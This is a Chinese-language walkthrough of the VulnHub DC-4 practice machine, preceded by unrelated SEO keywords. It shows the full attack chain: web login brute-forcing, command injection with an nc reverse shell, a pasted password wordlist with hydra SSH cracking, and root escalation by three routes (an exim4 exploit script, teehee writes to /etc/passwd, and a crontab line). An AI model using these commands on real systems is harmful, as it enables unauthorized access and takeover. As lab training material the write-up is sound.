自学网站开发难吗,南宁网络公司网站建设,营销网站好不好,网站 关键字一.环境搭建
1.下载地址
靶场下载地址:https://download.vulnhub.com/dc/DC-4.zip
下载不下来用迅雷下载
2.虚拟机配置
切换为nat模式 开启靶机#xff0c;遇到所有的错误直接点重试或者是#xff0c;开启后呈现为下图即可 二.开始渗透
1.信息收集
老规矩#xff0c;…一.环境搭建
1.下载地址
靶场下载地址:https://download.vulnhub.com/dc/DC-4.zip
下载不下来用迅雷下载
2.虚拟机配置
切换为nat模式 开启靶机遇到所有的错误直接点重试或者是开启后呈现为下图即可 二.开始渗透
1.信息收集
老规矩扫一下这个靶机的ip是多少
arp-scan -l 用nmap扫一下开放端口和服务
nmap -p- -sV 192.168.111.132 开启了一个ssh和http服务通过浏览器访问一下这个http服务 开始还以为是sql注入看了大佬的wp直接暴力破解那么我们也使用暴力破解来猜解密码一般这种靶机的暴力破解的密码还是挺简单的看到admin information用户名我们直接锁定admin
打开burpsuite抓包放到爆破模块去这部分操作不会可以看pikachu靶场的操作链接如下
pikachu靶场-暴力破解-CSDN博客 选中替换位置导入字典开始爆破这个操作自己搞定吧
账号密码爆破出来是admin/happy 点进去看一下功能点看到一个命令执行ls直接抓包尝试命令注入 2.漏洞利用获得shell
抓包到如下的数据包可以看到ls -l这个命令我们就在此处进行命令注入
可以参考如下这篇文章
pikachu靶场-RCE_rce的无过滤-CSDN博客 执行一下cat command.php查看一下这个命令文件的代码 数据包和代码如下可以
HTTP/1.1 200 OKServer: nginx/1.15.10Date: Sun, 24 Mar 2024 06:38:38 GMTContent-Type: text/html; charsetUTF-8Connection: closeExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 2522htmlheadtitleSystem Tools - Command/titlelink relstylesheet hrefcss/styles.css/headbodydiv classcontainerdiv classinnerYou are currently logged inp form methodpost actioncommand.phpstrongRun Command:/strongbrinput typeradio nameradio valuels -l checkedcheckedList Filesbr /input typeradio nameradio valuedu -hDisk Usagebr /input typeradio nameradio valuedf -hDisk Freebr /pinput typesubmit namesubmit valueRun/formYou have selected: cat command.phpbr /pre?php// Youd put this code at the top of any protected page you create// Always start this firstsession_start();if ( isset( $_SESSION[LoggedIn] ) ) {// Grab user data from the database using the user_id// Let them access the logged in only pages} else {// Redirect them to the login pageheader(Location: index.php);}?htmlheadtitleSystem Tools - Command/titlelink relstylesheet hrefcss/styles.css/headbodydiv classcontainerdiv classinner?php//if ($_SESSION[LoggedIn]) {if (isset($_SESSION[LoggedIn])) {echo You are currently logged inp;}else{}?form methodpost actioncommand.phpstrongRun Command:/strongbrinput typeradio nameradio valuels -l checkedcheckedList Filesbr /input typeradio nameradio valuedu -hDisk Usagebr /input typeradio nameradio valuedf -hDisk Freebr /pinput typesubmit namesubmit valueRun/form?php//if ($_SESSION[LoggedIn]) {if (isset($_SESSION[LoggedIn])) {if (isset($_POST[submit])) {if(isset($_POST[radio])){echo You have selected: .$_POST[radio] . br /;$my_cmd $_POST[radio];//echo $my_cmd;$output shell_exec($my_cmd);echo pre;print $output;echo /pre;}}echo pa hreflogin.phpReturn to the menu./a;}else{echo You need to be logged in to use this system.;echo pa hrefindex.phpClick to Log In Again/a;}?/div/div/body/html/prepa hreflogin.phpReturn to the menu./a /div/div/body/html 可以看到他的执行函数为shell_exec直接在kali端启一个端口监听反弹shell
在数据包中将命令替换为如下
nc 192.168.111.128 4444 -e /bin/bash在kali端启动端口监听
nc -lvvp 4444 在做这步操作的时候我靶机挂掉了一次直接重启虚拟机即可 获得到一个shell用python启一个交互式shell
python -c import pty;pty.spawn(/bin/sh) 在/home/jim/backups目录下看到备份密码的文件
3.密码爆破 000000
12345
iloveyou
1q2w3e4r5t
1234
123456a
qwertyuiop
monkey
123321
dragon
654321
666666
123
myspace1
a123456
121212
1qaz2wsx
123qwe
123abc
tinkle
target123
gwerty
1g2w3e4r
gwerty123
zag12wsx
7777777
qwerty1
1q2w3e4r
987654321
222222
qwe123
qwerty123
zxcvbnm
555555
112233
fuckyou
asdfghjkl
12345a
123123123
1q2w3e
qazwsx
loveme1
juventus
jennifer1
!~!1
bubbles
samuel
fuckoff
lovers
cheese1
0123456
123asd
999999999
madison
elizabeth1
music
buster1
lauren
david1
tigger1
123qweasd
taylor1
carlos
tinkerbell
samantha1
Sojdlg123aljg
joshua1
poop
stella
myspace123
asdasd5
freedom1
whatever1
xxxxxx
00000
valentina
a1b2c3
741852963
austin
monica
qaz123
lovely1
music1
harley1
family1
spongebob1
steven
nirvana
1234abcd
hellokitty
thomas1
cooper
520520
muffin
christian1
love13
fucku2
arsenal1
lucky7
diablo
apples
george1
babyboy1
crystal
1122334455
player1
aa123456
vfhbyf
forever1
Password
winston
chivas1
sexy
hockey1
1a2b3c4d
pussy
playboy1
stalker
cherry
tweety
toyota
creative
gemini
pretty1
maverick
brittany1
nathan1
letmein1
cameron1
secret1
google1
heaven
martina
murphy
spongebob
uQA9Ebw445
fernando
pretty
startfinding
softball
dolphin1
fuckme
test123
qwerty1234
kobe24
alejandro
adrian
september
aaaaaa1
bubba1
isabella
abc123456
password3
jason1
abcdefg123
loveyou1
shannon
100200
manuel
leonardo
molly1
flowers
123456z
007007
password.
321321
miguel
samsung1
sergey
sweet1
abc1234
windows
qwert123
vfrcbv
poohbear
d123456
school1
badboy
951753
123456c
111
steven1
snoopy1
garfield
YAgjecc826
compaq
candy1
sarah1
qwerty123456
123456l
eminem1
141414
789789
maria
steelers
iloveme1
morgan1
winner
boomer
lolita
nastya
alexis1
carmen
angelo
nicholas1
portugal
precious
jackass1
jonathan1
yfnfif
bitch
tiffany
rabbit
rainbow1
angel123
popcorn
barbara
brandy
starwars1
barney
natalia
jibril04
hiphop
tiffany1
shorty
poohbear1
simone
albert
marlboro
hardcore
cowboys
sydney
alex
scorpio
1234512345
q12345
qq123456
onelove
bond007
abcdefg1
eagles
crystal1
azertyuiop
winter
sexy12
angelina
james
svetlana
fatima
123456k
icecream
popcorn1生成密码爆破的文件用hydra进行ssh爆破
爆破ssh 通过目录可以得知用户名为jim hydra -l jim -P passwd.txt -t 10 ssh://192.168.111.132 爆破出ssh的账号密码为jim/jibril04进行登录
ssh jim192.168.111.132 在登录后提示我一个邮件查看邮件内容 给出了密码
Password is: ^xHhAhvim0y切换 Charles用户
su charles
sudo -l 查看一下可以执行的命令 发现有能够以root执行的teehee命令,而teehee的作用是可以向文件中追加内容这部分提权内容在其他标题下 4.权限提升
用find看一下root权限能执行的命令 可以看到一个exim4命令 版本号为4.89
用漏洞搜索工具查看一下有哪些可以利用的提权漏洞 查看漏洞利用脚本的地址在哪
searchsploit -p 46996 将脚本拷贝到jim的账户下
scp /usr/share/exploitdb/exploits/linux/local/46996.sh jim192.168.111.132:/home/jim 执行46996.sh
./46996.sh 成功提权为root 拿到最终的flag文件
三.其他
1.可以利用teehee命令写入/etc/passwd进行提权
teehee是个小众的linux编辑器。如果有sudo权限。可以利用其来提权
核心思路就是利用其在passwd文件中追加一条uid为0的用户条目
echo mlws::0:0:::/bin/bash | sudo teehee -a /etc/passwd
按照linux用户机制如果没有shadow条目且passwd用户密码条目为空的时候可以本地直接su空密码登录。
所以只需要执行su mlws就可以登录到mlws用户这个用户因为uid为0所以也是root权限 成功提权
2.可以利用teehee命令写入/etc/corntab进行提权
这个工具还有通过向定时任务/etc/crontab写入进行提权
echo * * * * * root chmod 4777 /bin/sh | sudo teehee -a /etc/crontab
表示在/etc/crontab下写入定时计划一分钟后由root用户给 /bin/bash 命令加权限chmod 4777即开启suid和rwx权限 也是成功进行提权
